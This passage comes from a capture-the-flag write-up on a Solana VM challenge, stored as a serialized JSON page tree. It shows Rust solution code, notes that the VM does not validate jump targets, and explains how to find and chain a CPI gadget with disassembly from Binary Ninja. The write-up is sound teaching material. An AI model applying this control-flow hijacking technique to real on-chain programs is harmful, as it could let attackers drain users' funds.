Ok(())\n}\n",[47115],{"type":25,"tag":82,"props":47116,"children":47117},{"__ignoreMap":7},[47118,47138,47162,47190,47218,47238,47274,47310,47317,47325,47358,47375,47400,47421,47473,47498,47505,47518,47564,47608,47616,47624,47635,47651,47662,47682,47702,47709,47745,47760,47767,47775,47854,47861,47872],{"type":25,"tag":216,"props":47119,"children":47120},{"class":6922,"line":6923},[47121,47125,47129,47134],{"type":25,"tag":216,"props":47122,"children":47123},{"style":6936},[47124],{"type":31,"value":17647},{"type":25,"tag":216,"props":47126,"children":47127},{"style":6936},[47128],{"type":31,"value":17652},{"type":25,"tag":216,"props":47130,"children":47131},{"style":7047},[47132],{"type":31,"value":47133}," process_instruction",{"type":25,"tag":216,"props":47135,"children":47136},{"style":6964},[47137],{"type":31,"value":7420},{"type":25,"tag":216,"props":47139,"children":47140},{"class":6922,"line":6769},[47141,47146,47150,47154,47158],{"type":25,"tag":216,"props":47142,"children":47143},{"style":6947},[47144],{"type":31,"value":47145},"    program_id",{"type":25,"tag":216,"props":47147,"children":47148},{"style":6953},[47149],{"type":31,"value":1472},{"type":25,"tag":216,"props":47151,"children":47152},{"style":6953},[47153],{"type":31,"value":11093},{"type":25,"tag":216,"props":47155,"children":47156},{"style":7375},[47157],{"type":31,"value":25358},{"type":25,"tag":216,"props":47159,"children":47160},{"style":6964},[47161],{"type":31,"value":7465},{"type":25,"tag":216,"props":47163,"children":47164},{"class":6922,"line":6778},[47165,47170,47174,47178,47182,47186],{"type":25,"tag":216,"props":47166,"children":47167},{"style":6947},[47168],{"type":31,"value":47169},"    accounts",{"type":25,"tag":216,"props":47171,"children":47172},{"style":6953},[47173],{"type":31,"value":1472},{"type":25,"tag":216,"props":47175,"children":47176},{"style":6953},[47177],{"type":31,"value":11093},{"type":25,"tag":216,"props":47179,"children":47180},{"style":6964},[47181],{"type":31,"value":7701},{"type":25,"tag":216,"props":47183,"children":47184},{"style":7375},[47185],{"type":31,"value":18896},{"type":25,"tag":216,"props":47187,"children":47188},{"style":6964},[47189],{"type":31,"value":18220},{"type":25,"tag":216,"props":47191,"children":47192},{"class":6922,"line":7005},[47193,47198,47202,47206,47210,47214],{"type":25,"tag":216,"props":47194,"children":47195},{"style":6947},[47196],{"type":31,"value":47197},"    data",{"type":25,"tag":216,"props":47199,"children":47200},{"style":6953},[47201],{"type":31,"value":1472},{"type":25,"tag":216,"props":47203,"children":47204},{"style":6953},[47205],{"type":31,"value":11093},{"type":25,"tag":216,"props":47207,"children":47208},{"style":6964},[47209],{"type":31,"value":7701},{"type":25,"tag":216,"props":47211,"children":47212},{"style":7375},[47213],{"type":31,"value":7378},{"type":25,"tag":216,"props":47215,"children":47216},{"style":6964},[47217],{"type":31,"value":15728},{"type":25,"tag":216,"props":47219,"children":47220},{"class":6922,"line":7110},[47221,47225,47229,47234],{"type":25,"tag":216,"props":47222,"children":47223},{"style":6964},[47224],{"type":31,"value":7036},{"type":25,"tag":216,"props":47226,"children":47227},{"style":6953},[47228],{"type":31,"value":17714},{"type":25,"tag":216,"props":47230,"children":47231},{"style":7375},[47232],{"type":31,"value":47233}," ProgramResult",{"type":25,"tag":216,"props":47235,"children":47236},{"style":6964},[47237],{"type":31,"value":7241},{"type":25,"tag":216,"props":47239,"children":47240},{"class":6922,"line":7216},[47241,47245,47250,47254,47258,47262,47266,47270],{"type":25,"tag":216,"props":47242,"children":47243},{"style":6936},[47244],{"type":31,"value":6939},{"type":25,"tag":216,"props":47246,"children":47247},{"style":6947},[47248],{"type":31,"value":47249}," flag_pda_ai",{"type":25,"tag":216,"props":47251,"children":47252},{"style":6953},[47253],{"type":31,"value":6956},{"type":25,"tag":216,"props":47255,"children":47256},{"style":6953},[47257],{"type":31,"value":11093},{"type":25,"tag":216,"props":47259,"children":47260},{"style":6947},[47261],{"type":31,"value":18632},{"type":25,"tag":216,"props":47263,"children":47264},{"style":6964},[47265],{"type":31,"value":7701},{"type":25,"tag":216,"props":47267,"children":47268},{"style":6989},[47269],{"type":31,"value":1882},{"type":25,"tag":216,"props":47271,"children":47272},{"style":6964},[47273],{"type":31,"value":35536},{"type":25,"tag":216,"props":47275,"children":47276},{"class":6922,"line":7244},[47277,47281,47286,47290,47294,47298,47302,47306],{"type":25,"tag":216,"props":47278,"children":47279},{"style":6936},[47280],{"type":31,"value":6939},{"type":25,"tag":216,"props":47282,"children":47283},{"style":6947},[47284],{"type":31,"value":47285}," user_ai",{"type":25,"tag":216,"props":47287,"children":47288},{"style":6953},[47289],{"type":31,"value":6956},{"type":25,"tag":216,"props":47291,"children":47292},{"style":6953},[47293],{"type":31,"value":11093},{"type":25,"tag":216,"props":47295,"children":47296},{"style":6947},[47297],{"type":31,"value":18632},{"type":25,"tag":216,"props":47299,"children":47300},{"style":6964},[47301],{"type":31,"value":7701},{"type":25,"tag":216,"props":47303,"children":47304},{"style":6989},[47305],{"type":31,"value":184},{"type":25,"tag":216,"props":47307,"children":47308},{"style":6964},[47309],{"type":31,"value":35536},{"type":25,"tag":216,"props":47311,"children":47312},{"class":6922,"line":7257},[47313],{"type":25,"tag":216,"props":47314,"children":47315},{"emptyLinePlaceholder":16},[47316],{"type":31,"value":7642},{"type":25,"tag":216,"props":47318,"children":47319},{"class":6922,"line":7275},[47320],{"type":25,"tag":216,"props":47321,"children":47322},{"style":6927},[47323],{"type":31,"value":47324},"    // Step 1: Create a new account with 0x1337 bytes of data\n",{"type":25,"tag":216,"props":47326,"children":47327},{"class":6922,"line":7296},[47328,47332,47337,47341,47345,47349,47354],{"type":25,"tag":216,"props":47329,"children":47330},{"style":6936},[47331],{"type":31,"value":6939},{"type":25,"tag":216,"props":47333,"children":47334},{"style":6947},[47335],{"type":31,"value":47336}," instruction",{"type":25,"tag":216,"props":47338,"children":47339},{"style":6953},[47340],{"type":31,"value":6956},{"type":25,"tag":216,"props":47342,"children":47343},{"style":7375},[47344],{"type":31,"value":44976},{"type":25,"tag":216,"props":47346,"children":47347},{"style":6953},[47348],{"type":31,"value":7438},{"type":25,"tag":216,"props":47350,"children":47351},{"style":7047},[47352],{"type":31,"value":47353},"new_with_bincode",{"type":25,"tag":216,"props":47355,"children":47356},{"style":6964},[47357],{"type":31,"value":7420},{"type":25,"tag":216,"props":47359,"children":47360},{"class":6922,"line":7305},[47361,47366,47370],{"type":25,"tag":216,"props":47362,"children":47363},{"style":6964},[47364],{"type":31,"value":47365},"        system_program",{"type":25,"tag":216,"props":47367,"children":47368},{"style":6953},[47369],{"type":31,"value":7438},{"type":25,"tag":216,"props":47371,"children":47372},{"style":6964},[47373],{"type":31,"value":47374},"ID,\n",{"type":25,"tag":216,"props":47376,"children":47377},{"class":6922,"line":7557},[47378,47382,47387,47391,47396],{"type":25,"tag":216,"props":47379,"children":47380},{"style":6953},[47381],{"type":31,"value":7428},{"type":25,"tag":216,"props":47383,"children":47384},{"style":6964},[47385],{"type":31,"value":47386},"SystemInstruction",{"type":25,"tag":216,"props":47388,"children":47389},{"style":6953},[47390],{"type":31,"value":7438},{"type":25,"tag":216,"props":47392,"children":47393},{"style":7375},[47394],{"type":31,"value":47395},"CreateAccount",{"type":25,"tag":216,"props":47397,"children":47398},{"style":6964},[47399],{"type":31,"value":7241},{"type":25,"tag":216,"props":47401,"children":47402},{"class":6922,"line":7574},[47403,47408,47412,47417],{"type":25,"tag":216,"props":47404,"children":47405},{"style":6947},[47406],{"type":31,"value":47407},"            space",{"type":25,"tag":216,"props":47409,"children":47410},{"style":6953},[47411],{"type":31,"value":1472},{"type":25,"tag":216,"props":47413,"children":47414},{"style":6989},[47415],{"type":31,"value":47416}," 0x1337",{"type":25,"tag":216,"props":47418,"children":47419},{"style":6964},[47420],{"type":31,"value":7465},{"type":25,"tag":216,"props":47422,"children":47423},{"class":6922,"line":7591},[47424,47429,47433,47438,47442,47447,47451,47455,47460,47464,47469],{"type":25,"tag":216,"props":47425,"children":47426},{"style":6947},[47427],{"type":31,"value":47428},"            lamports",{"type":25,"tag":216,"props":47430,"children":47431},{"style":6953},[47432],{"type":31,"value":1472},{"type":25,"tag":216,"props":47434,"children":47435},{"style":6964},[47436],{"type":31,"value":47437}," Rent",{"type":25,"tag":216,"props":47439,"children":47440},{"style":6953},[47441],{"type":31,"value":7438},{"type":25,"tag":216,"props":47443,"children":47444},{"style":7047},[47445],{"type":31,"value":47446},"default",{"type":25,"tag":216,"props":47448,"children":47449},{"style":6964},[47450],{"type":31,"value":17836},{"type":25,"tag":216,"props":47452,"children":47453},{"style":6953},[47454],{"type":31,"value":179},{"type":25,"tag":216,"props":47456,"children":47457},{"style":7047},[47458],{"type":31,"value":47459},"minimum_balance",{"type":25,"tag":216,"props":47461,"children":47462},{"style":6964},[47463],{"type":31,"value":1850},{"type":25,"tag":216,"props":47465,"children":47466},{"style":6989},[47467],{"type":31,"value":47468},"0x1337",{"type":25,"tag":216,"props":47470,"children":47471},{"style":6964},[47472],{"type":31,"value":10688},{"type":25,"tag":216,"props":47474,"children":47475},{"class":6922,"line":7604},[47476,47481,47485,47489,47493],{"type":25,"tag":216,"props":47477,"children":47478},{"style":6947},[47479],{"type":31,"value":47480},"            owner",{"type":25,"tag":216,"props":47482,"children":47483},{"style":6953},[47484],{"type":31,"value":1472},{"type":25,"tag":216,"props":47486,"children":47487},{"style":6964},[47488],{"type":31,"value":46008},{"type":25,"tag":216,"props":47490,"children":47491},{"style":6953},[47492],{"type":31,"value":7438},{"type":25,"tag":216,"props":47494,"children":47495},{"style":6964},[47496],{"type":31,"value":47497},"ID\n",{"type":25,"tag":216,"props":47499,"children":47500},{"class":6922,"line":7613},[47501],{"type":25,"tag":216,"props":47502,"children":47503},{"style":6964},[47504],{"type":31,"value":29331},{"type":25,"tag":216,"props":47506,"children":47507},{"class":6922,"line":7636},[47508,47513],{"type":25,"tag":216,"props":47509,"children":47510},{"style":7047},[47511],{"type":31,"value":47512},"        vec!",{"type":25,"tag":216,"props":47514,"children":47515},{"style":6964},[47516],{"type":31,"value":47517},"[\n",{"type":25,"tag":216,"props":47519,"children":47520},{"class":6922,"line":7645},[47521,47526,47530,47534,47538,47542,47547,47551,47556,47560],{"type":25,"tag":216,"props":47522,"children":47523},{"style":6964},[47524],{"type":31,"value":47525},"            AccountMeta",{"type":25,"tag":216,"props":47527,"children":47528},{"style":6953},[47529],{"type":31,"value":7438},{"type":25,"tag":216,"props":47531,"children":47532},{"style":7047},[47533],{"type":31,"value":19080},{"type":25,"tag":216,"props":47535,"children":47536},{"style":6964},[47537],{"type":31,"value":1850},{"type":25,"tag":216,"props":47539,"children":47540},{"style":6953},[47541],{"type":31,"value":8519},{"type":25,"tag":216,"props":47543,"children":47544},{"style":6947},[47545],{"type":31,"value":47546},"user_ai",{"type":25,"tag":216,"props":47548,"children":47549},{"style":6953},[47550],{"type":31,"value":179},{"type":25,"tag":216,"props":47552,"children":47553},{"style":6964},[47554],{"type":31,"value":47555},"key, ",{"type":25,"tag":216,"props":47557,"children":47558},{"style":6936},[47559],{"type":31,"value":230},{"type":25,"tag":216,"props":47561,"children":47562},{"style":6964},[47563],{"type":31,"value":10688},{"type":25,"tag":216,"props":47565,"children":47566},{"class":6922,"line":7654},[47567,47571,47575,47579,47583,47587,47592,47596,47600,47604],{"type":25,"tag":216,"props":47568,"children":47569},{"style":6964},[47570],{"type":31,"value":47525},{"type":25,"tag":216,"props":47572,"children":47573},{"style":6953},[47574],{"type":31,"value":7438},{"type":25,"tag":216,"props":47576,"children":47577},{"style":7047},[47578],{"type":31,"value":19080},{"type":25,"tag":216,"props":47580,"children":47581},{"style":6964},[47582],{"type":31,"value":1850},{"type":25,"tag":216,"props":47584,"children":47585},{"style":6953},[47586],{"type":31,"value":8519},{"type":25,"tag":216,"props":47588,"children":47589},{"style":6947},[47590],{"type":31,"value":47591},"flag_pda_ai",{"type":25,"tag":216,"props":47593,"children":47594},{"style":6953},[47595],{"type":31,"value":179},{"type":25,"tag":216,"props":47597,"children":47598},{"style":6964},[47599],{"type":31,"value":47555},{"type":25,"tag":216,"props":47601,"children":47602},{"style":6936},[47603],{"type":31,"value":230},{"type":25,"tag":216,"props":47605,"children":47606},{"style":6964},[47607],{"type":31,"value":10688},{"type":25,"tag":216,"props":47609,"children":47610},{"class":6922,"line":7722},[47611],{"type":25,"tag":216,"props":47612,"children":47613},{"style":6964},[47614],{"type":31,"value":47615},"        ],\n",{"type":25,"tag":216,"props":47617,"children":47618},{"class":6922,"line":7730},[47619],{"type":25,"tag":216,"props":47620,"children":47621},{"style":6964},[47622],{"type":31,"value":47623},"    );\n",{"type":25,"tag":216,"props":47625,"children":47626},{"class":6922,"line":7760},[47627,47631],{"type":25,"tag":216,"props":47628,"children":47629},{"style":7047},[47630],{"type":31,"value":45093},{"type":25,"tag":216,"props":47632,"children":47633},{"style":6964},[47634],{"type":31,"value":7420},{"type":25,"tag":216,"props":47636,"children":47637},{"class":6922,"line":7768},[47638,47642,47647],{"type":25,"tag":216,"props":47639,"children":47640},{"style":6953},[47641],{"type":31,"value":7428},{"type":25,"tag":216,"props":47643,"children":47644},{"style":6947},[47645],{"type":31,"value":47646},"instruction",{"type":25,"tag":216,"props":47648,"children":47649},{"style":6964},[47650],{"type":31,"value":7465},{"type":25,"tag":216,"props":47652,"children":47653},{"class":6922,"line":7800},[47654,47658],{"type":25,"tag":216,"props":47655,"children":47656},{"style":6953},[47657],{"type":31,"value":7428},{"type":25,"tag":216,"props":47659,"children":47660},{"style":6964},[47661],{"type":31,"value":47517},{"type":25,"tag":216,"props":47663,"children":47664},{"class":6922,"line":7808},[47665,47670,47674,47678],{"type":25,"tag":216,"props":47666,"children":47667},{"style":6947},[47668],{"type":31,"value":47669},"            user_ai",{"type":25,"tag":216,"props":47671,"children":47672},{"style":6953},[47673],{"type":31,"value":179},{"type":25,"tag":216,"props":47675,"children":47676},{"style":7047},[47677],{"type":31,"value":19377},{"type":25,"tag":216,"props":47679,"children":47680},{"style":6964},[47681],{"type":31,"value":7448},{"type":25,"tag":216,"props":47683,"children":47684},{"class":6922,"line":7868},[47685,47690,47694,47698],{"type":25,"tag":216,"props":47686,"children":47687},{"style":6947},[47688],{"type":31,"value":47689},"            flag_pda_ai",{"type":25,"tag":216,"props":47691,"children":47692},{"style":6953},[47693],{"type":31,"value":179},{"type":25,"tag":216,"props":47695,"children":47696},{"style":7047},[47697],{"type":31,"value":19377},{"type":25,"tag":216,"props":47699,"children":47700},{"style":6964},[47701],{"type":31,"value":7448},{"type":25,"tag":216,"props":47703,"children":47704},{"class":6922,"line":13001},[47705],{"type":25,"tag":216,"props":47706,"children":47707},{"style":6964},[47708],{"type":31,"value":47615},{"type":25,"tag":216,"props":47710,"children":47711},{"class":6922,"line":13019},[47712,47716,47720,47724,47728,47732,47736,47740],{"type":25,"tag":216,"props":47713,"children":47714},{"style":6953},[47715],{"type":31,"value":7428},{"type":25,"tag":216,"props":47717,"children":47718},{"style":6964},[47719],{"type":31,"value":7701},{"type":25,"tag":216,"props":47721,"children":47722},{"style":6953},[47723],{"type":31,"value":7059},{"type":25,"tag":216,"props":47725,"children":47726},{"style":6964},[47727],{"type":31,"value":7701},{"type":25,"tag":216,"props":47729,"children":47730},{"style":8205},[47731],{"type":31,"value":46588},{"type":25,"tag":216,"props":47733,"children":47734},{"style":6953},[47735],{"type":31,"value":179},{"type":25,"tag":216,"props":47737,"children":47738},{"style":7047},[47739],{"type":31,"value":46597},{"type":25,"tag":216,"props":47741,"children":47742},{"style":6964},[47743],{"type":31,"value":47744},"()]],\n",{"type":25,"tag":216,"props":47746,"children":47747},{"class":6922,"line":13064},[47748,47752,47756],{"type":25,"tag":216,"props":47749,"children":47750},{"style":6964},[47751],{"type":31,"value":7619},{"type":25,"tag":216,"props":47753,"children":47754},{"style":6953},[47755],{"type":31,"value":604},{"type":25,"tag":216,"props":47757,"children":47758},{"style":6964},[47759],{"type":31,"value":6967},{"type":25,"tag":216,"props":47761,"children":47762},{"class":6922,"line":13170},[47763],{"type":25,"tag":216,"props":47764,"children":47765},{"emptyLinePlaceholder":16},[47766],{"type":31,"value":7642},{"type":25,"tag":216,"props":47768,"children":47769},{"class":6922,"line":27455},[47770],{"type":25,"tag":216,"props":47771,"children":47772},{"style":6927},[47773],{"type":31,"value":47774},"    // Step 2: Write 0x4337 to the first 8 bytes of the account\n",{"type":25,"tag":216,"props":47776,"children":47777},{"class":6922,"line":27490},[47778,47783,47787,47791,47795,47799,47803,47807,47811,47815,47819,47824,47828,47832,47837,47841,47845,47850],{"type":25,"tag":216,"props":47779,"children":47780},{"style":6947},[47781],{"type":31,"value":47782},"    flag_pda_ai",{"type":25,"tag":216,"props":47784,"children":47785},{"style":6953},[47786],{"type":31,"value":179},{"type":25,"tag":216,"props":47788,"children":47789},{"style":7047},[47790],{"type":31,"value":17831},{"type":25,"tag":216,"props":47792,"children":47793},{"style":6964},[47794],{"type":31,"value":17836},{"type":25,"tag":216,"props":47796,"children":47797},{"style":6953},[47798],{"type":31,"value":604},{"type":25,"tag":216,"props":47800,"children":47801},{"style":6964},[47802],{"type":31,"value":7701},{"type":25,"tag":216,"props":47804,"children":47805},{"style":6953},[47806],{"type":31,"value":6997},{"type":25,"tag":216,"props":47808,"children":47809},{"style":6989},[47810],{"type":31,"value":8031},{"type":25,"tag":216,"props":47812,"children":47813},{"style":6964},[47814],{"type":31,"value":19368},{"type":25,"tag":216,"props":47816,"children":47817},{"style":6953},[47818],{"type":31,"value":179},{"type":25,"tag":216,"props":47820,"children":47821},{"style":7047},[47822],{"type":31,"value":47823},"copy_from_slice",{"type":25,"tag":216,"props":47825,"children":47826},{"style":6964},[47827],{"type":31,"value":1850},{"type":25,"tag":216,"props":47829,"children":47830},{"style":6953},[47831],{"type":31,"value":7059},{"type":25,"tag":216,"props":47833,"children":47834},{"style":6989},[47835],{"type":31,"value":47836},"0x4337",{"type":25,"tag":216,"props":47838,"children":47839},{"style":7375},[47840],{"type":31,"value":11994},{"type":25,"tag":216,"props":47842,"children":47843},{"style":6953},[47844],{"type":31,"value":179},{"type":25,"tag":216,"props":47846,"children":47847},{"style":7047},[47848],{"type":31,"value":47849},"to_le_bytes",{"type":25,"tag":216,"props":47851,"children":47852},{"style":6964},[47853],{"type":31,"value":19382},{"type":25,"tag":216,"props":47855,"children":47856},{"class":6922,"line":27498},[47857],{"type":25,"tag":216,"props":47858,"children":47859},{"emptyLinePlaceholder":16},[47860],{"type":31,"value":7642},{"type":25,"tag":216,"props":47862,"children":47863},{"class":6922,"line":27506},[47864,47868],{"type":25,"tag":216,"props":47865,"children":47866},{"style":7375},[47867],{"type":31,"value":18290},{"type":25,"tag":216,"props":47869,"children":47870},{"style":6964},[47871],{"type":31,"value":18295},{"type":25,"tag":216,"props":47873,"children":47874},{"class":6922,"line":27515},[47875],{"type":25,"tag":216,"props":47876,"children":47877},{"style":6964},[47878],{"type":31,"value":7874},{"type":25,"tag":38,"props":47880,"children":47881},{},[47882],{"type":31,"value":47883},"To test this theory, we can execute the program above inside the test environment, and see if we can get the flag:",{"type":25,"tag":38,"props":47885,"children":47886},{},[47887],{"type":25,"tag":6467,"props":47888,"children":47891},{"alt":47889,"src":47890},"Screenshot","/posts/jumping-around-in-the-vm/screenshot.png",[],{"type":25,"tag":38,"props":47893,"children":47894},{},[47895],{"type":31,"value":47896},"It works! Now we \"just\" need to find a way to execute the program above, by leveraging the single Instruction call to the program. This is easier said than done. The next section will dive into the details of the Solana VM to understand how we can achieve this.",{"type":25,"tag":26,"props":47898,"children":47900},{"id":47899},"solution-implementation",[47901],{"type":31,"value":47902},"Solution Implementation",{"type":25,"tag":38,"props":47904,"children":47905},{},[47906,47908,47913],{"type":31,"value":47907},"Now that we know what we need to do, let's look at how we can actually do it. We have to code the above program, by chaining together multiple ",{"type":25,"tag":82,"props":47909,"children":47911},{"className":47910},[],[47912],{"type":31,"value":39644},{"type":31,"value":47914}," invocations:",{"type":25,"tag":206,"props":47916,"children":47920},{"className":47917,"code":47918,"language":47919,"meta":7,"style":7},"language-mermaid shiki shiki-themes slack-dark","graph LR\n    A[0: entrypoint] --> B[1: process_instruction]\n    B --> C[2: process]\n    C --> D[3: gadget1]\n    C --> E[3: process]\n    E --> F[4: gadget2]\n    E --> G[...]\n","mermaid",[47921],{"type":25,"tag":82,"props":47922,"children":47923},{"__ignoreMap":7},[47924,47932,47940,47948,47956,47964,47972],{"type":25,"tag":216,"props":47925,"children":47926},{"class":6922,"line":6923},[47927],{"type":25,"tag":216,"props":47928,"children":47929},{},[47930],{"type":31,"value":47931},"graph LR\n",{"type":25,"tag":216,"props":47933,"children":47934},{"class":6922,"line":6769},[47935],{"type":25,"tag":216,"props":47936,"children":47937},{},[47938],{"type":31,"value":47939},"    A[0: entrypoint] --> B[1: process_instruction]\n",{"type":25,"tag":216,"props":47941,"children":47942},{"class":6922,"line":6778},[47943],{"type":25,"tag":216,"props":47944,"children":47945},{},[47946],{"type":31,"value":47947},"    B --> C[2: process]\n",{"type":25,"tag":216,"props":47949,"children":47950},{"class":6922,"line":7005},[47951],{"type":25,"tag":216,"props":47952,"children":47953},{},[47954],{"type":31,"value":47955},"    C --> D[3: gadget1]\n",{"type":25,"tag":216,"props":47957,"children":47958},{"class":6922,"line":7110},[47959],{"type":25,"tag":216,"props":47960,"children":47961},{},[47962],{"type":31,"value":47963},"    C --> E[3: process]\n",{"type":25,"tag":216,"props":47965,"children":47966},{"class":6922,"line":7216},[47967],{"type":25,"tag":216,"props":47968,"children":47969},{},[47970],{"type":31,"value":47971},"    E --> F[4: gadget2]\n",{"type":25,"tag":216,"props":47973,"children":47974},{"class":6922,"line":7244},[47975],{"type":25,"tag":216,"props":47976,"children":47977},{},[47978],{"type":31,"value":47979},"    E --> G[...]\n",{"type":25,"tag":38,"props":47981,"children":47982},{},[47983],{"type":31,"value":47984},"What are those gadgets? The Solana VM does not enforce that the target of a jump is a valid one, meaning that it's possible to jump to arbitrary addresses!",{"type":25,"tag":38,"props":47986,"children":47987},{},[47988,47990,47996],{"type":31,"value":47989},"To mimic the execution of our solution, we need a gadget that lets us CPI into system_program, with parameters we control. How do we obtain those? We can use ",{"type":25,"tag":162,"props":47991,"children":47993},{"href":44451,"rel":47992},[166],[47994],{"type":31,"value":47995},"Binary Ninja",{"type":31,"value":47997}," to find a suitable gadget for this.",{"type":25,"tag":38,"props":47999,"children":48000},{},[48001,48003,48010],{"type":31,"value":48002},"Before throwing the on-chain program to binja, it's useful to find a way to get symbols for it. One solution is to patch the cargo-build-sbf command to ",{"type":25,"tag":162,"props":48004,"children":48007},{"href":48005,"rel":48006},"https://github.com/solana-labs/solana/blob/4ee5078e5ffdfff36d3f7920217788e2892c1a85/sdk/cargo-build-sbf/src/main.rs#L789",[166],[48008],{"type":31,"value":48009},"skip the strip pass",{"type":31,"value":179},{"type":25,"tag":606,"props":48012,"children":48014},{"id":48013},"cpi-gadget",[48015],{"type":31,"value":48016},"CPI Gadget",{"type":25,"tag":38,"props":48018,"children":48019},{},[48020,48022,48027,48029,48036,48038,48044],{"type":31,"value":48021},"Looking at the program source, one idea is to look for the cpi gadget around the ",{"type":25,"tag":82,"props":48023,"children":48025},{"className":48024},[],[48026],{"type":31,"value":42259},{"type":31,"value":48028}," function. This function calls into the solana sdk's function ",{"type":25,"tag":162,"props":48030,"children":48033},{"href":48031,"rel":48032},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L295-L310",[166],[48034],{"type":31,"value":48035},"invoke_signed_unchecked",{"type":31,"value":48037},", yielding a powerful gadget at the address ",{"type":25,"tag":82,"props":48039,"children":48041},{"className":48040},[],[48042],{"type":31,"value":48043},"0x100001ba8",{"type":31,"value":179},{"type":25,"tag":206,"props":48046,"children":48048},{"className":6915,"code":48047,"language":6914,"meta":7,"style":7},"solana_program::program::invoke_signed_unchecked\n100001ba8  79a278ff00000000   ldxdw r2, [r10-136] {var_88}\n100001bb0  79a380ff00000000   ldxdw r3, [r10-128] {var_80}\n100001bb8  79a468ff00000000   ldxdw r4, [r10-152] {var_98}\n100001bc0  79a570ff00000000   ldxdw r5, [r10-144] {var_90}\n100001bc8  8520000020100000   call sol_invoke_signed_rust\n100001bd0  5500040000000000   jne \u003C+4> r0, 0x0\n\n100001bd8  b701000018000000   mov r1, 0x18\n100001be0  79a288ff00000000   ldxdw r2, [r10-120] {var_78}\n100001be8  6312000000000000   stxw [r2-0], r1  {0x18}\n100001bf0  0500030000000000   ja \u003C+3>\n\n100001bf8  79a188ff00000000   ldxdw r1, [r10-120] {var_78}\n100001c00  bf02000000000000   mov r2, r0\n100001c08  8510000075000000   call _ZN94_$LT$solana_program...$u64$GT$$GT$4from17ha0d289b72861b06dE\n\n100001c10  79a2b8ff00000000   ldxdw r2, [r10-72] {var_48}\n100001c18  1502040000000000   jeq \u003C+4> r2, 0x0\n\n100001c20  2702000022000000   mul r2, 0x22\n100001c28  79a1b0ff00000000   ldxdw r1, [r10-80] {var_50}\n100001c30  b703000001000000   mov r3, 0x1\n100001c38  8510000003feffff   call __rust_dealloc\n\n100001c40  79a2d0ff00000000   ldxdw r2, [r10-48] {var_30}\n100001c48  1502030000000000   jeq \u003C+3> r2, 0x0\n\n100001c50  79a1c8ff00000000   ldxdw r1, [r10-56] {var_38}\n100001c58  b703000001000000   mov r3, 0x1\n100001c60  85100000fefdffff   call __rust_dealloc\n\n100001c68  9500000000000000   exit {__return_addr}\n",[48049],{"type":25,"tag":82,"props":48050,"children":48051},{"__ignoreMap":7},[48052,48077,48133,48184,48235,48287,48310,48358,48365,48397,48448,48506,48540,48547,48596,48626,48701,48708,48759,48805,48812,48843,48894,48924,48946,48953,49004,49049,49056,49107,49135,49156,49163],{"type":25,"tag":216,"props":48053,"children":48054},{"class":6922,"line":6923},[48055,48059,48063,48068,48072],{"type":25,"tag":216,"props":48056,"children":48057},{"style":6964},[48058],{"type":31,"value":17610},{"type":25,"tag":216,"props":48060,"children":48061},{"style":6953},[48062],{"type":31,"value":7438},{"type":25,"tag":216,"props":48064,"children":48065},{"style":6964},[48066],{"type":31,"value":48067},"program",{"type":25,"tag":216,"props":48069,"children":48070},{"style":6953},[48071],{"type":31,"value":7438},{"type":25,"tag":216,"props":48073,"children":48074},{"style":6947},[48075],{"type":31,"value":48076},"invoke_signed_unchecked\n",{"type":25,"tag":216,"props":48078,"children":48079},{"class":6922,"line":6769},[48080,48085,48090,48095,48100,48105,48110,48114,48119,48124,48129],{"type":25,"tag":216,"props":48081,"children":48082},{"style":6947},[48083],{"type":31,"value":48084},"100001ba8",{"type":25,"tag":216,"props":48086,"children":48087},{"style":6947},[48088],{"type":31,"value":48089},"  79a278ff00000000",{"type":25,"tag":216,"props":48091,"children":48092},{"style":6947},[48093],{"type":31,"value":48094},"   ldxdw",{"type":25,"tag":216,"props":48096,"children":48097},{"style":6947},[48098],{"type":31,"value":48099}," r2",{"type":25,"tag":216,"props":48101,"children":48102},{"style":6964},[48103],{"type":31,"value":48104},", [",{"type":25,"tag":216,"props":48106,"children":48107},{"style":6947},[48108],{"type":31,"value":48109},"r10",{"type":25,"tag":216,"props":48111,"children":48112},{"style":6953},[48113],{"type":31,"value":8276},{"type":25,"tag":216,"props":48115,"children":48116},{"style":6989},[48117],{"type":31,"value":48118},"136",{"type":25,"tag":216,"props":48120,"children":48121},{"style":6964},[48122],{"type":31,"value":48123},"] {",{"type":25,"tag":216,"props":48125,"children":48126},{"style":6947},[48127],{"type":31,"value":48128},"var_88",{"type":25,"tag":216,"props":48130,"children":48131},{"style":6964},[48132],{"type":31,"value":7874},{"type":25,"tag":216,"props":48134,"children":48135},{"class":6922,"line":6778},[48136,48141,48146,48150,48155,48159,48163,48167,48171,48175,48180],{"type":25,"tag":216,"props":48137,"children":48138},{"style":6947},[48139],{"type":31,"value":48140},"100001bb0",{"type":25,"tag":216,"props":48142,"children":48143},{"style":6947},[48144],{"type":31,"value":48145},"  79a380ff00000000",{"type":25,"tag":216,"props":48147,"children":48148},{"style":6947},[48149],{"type":31,"value":48094},{"type":25,"tag":216,"props":48151,"children":48152},{"style":6947},[48153],{"type":31,"value":48154}," r3",{"type":25,"tag":216,"props":48156,"children":48157},{"style":6964},[48158],{"type":31,"value":48104},{"type":25,"tag":216,"props":48160,"children":48161},{"style":6947},[48162],{"type":31,"value":48109},{"type":25,"tag":216,"props":48164,"children":48165},{"style":6953},[48166],{"type":31,"value":8276},{"type":25,"tag":216,"props":48168,"children":48169},{"style":6989},[48170],{"type":31,"value":33808},{"type":25,"tag":216,"props":48172,"children":48173},{"style":6964},[48174],{"type":31,"value":48123},{"type":25,"tag":216,"props":48176,"children":48177},{"style":6947},[48178],{"type":31,"value":48179},"var_80",{"type":25,"tag":216,"props":48181,"children":48182},{"style":6964},[48183],{"type":31,"value":7874},{"type":25,"tag":216,"props":48185,"children":48186},{"class":6922,"line":7005},[48187,48192,48197,48201,48206,48210,48214,48218,48222,48226,48231],{"type":25,"tag":216,"props":48188,"children":48189},{"style":6947},[48190],{"type":31,"value":48191},"100001bb8",{"type":25,"tag":216,"props":48193,"children":48194},{"style":6947},[48195],{"type":31,"value":48196},"  79a468ff00000000",{"type":25,"tag":216,"props":48198,"children":48199},{"style":6947},[48200],{"type":31,"value":48094},{"type":25,"tag":216,"props":48202,"children":48203},{"style":6947},[48204],{"type":31,"value":48205}," 